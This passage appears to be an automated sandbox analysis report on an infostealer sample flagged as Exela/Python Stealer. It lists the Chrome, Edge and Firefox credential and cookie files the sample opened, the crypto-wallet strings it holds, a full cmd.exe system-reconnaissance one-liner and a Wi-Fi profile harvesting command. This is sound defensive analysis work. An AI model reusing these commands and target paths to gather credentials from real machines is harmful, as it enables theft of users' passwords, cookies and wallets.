            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\net1.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B6D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7B2B6D010
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B85C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7B2B85C00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Modifies the windows firewall
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Uses netsh to modify the Windows network and firewall settings
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ollydbg.exe

            Stealing of Sensitive Information

            barindex
            Yara detected Exela Stealer
            Source: Yara matchFile source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Yara detected Python Stealer
            Source: Yara matchFile source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Detected generic credential text file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\system_info.txtJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Cookies.txtJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\process_info.txtJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Firefox\History.txtJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\network_info.txtJump to behavior
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: "Electrum"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: "Jaxx"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: "Exodus"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: "Ethereum"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427288406.0000018B47B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: "keystore"
            Gathers network related connection and port information
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Tries to harvest and steal WLAN passwords
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\gleanJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removedJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backupsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfbaJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumpsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanentJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\eventsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\eventsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmpJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.filesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chromeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\dbJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-releaseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
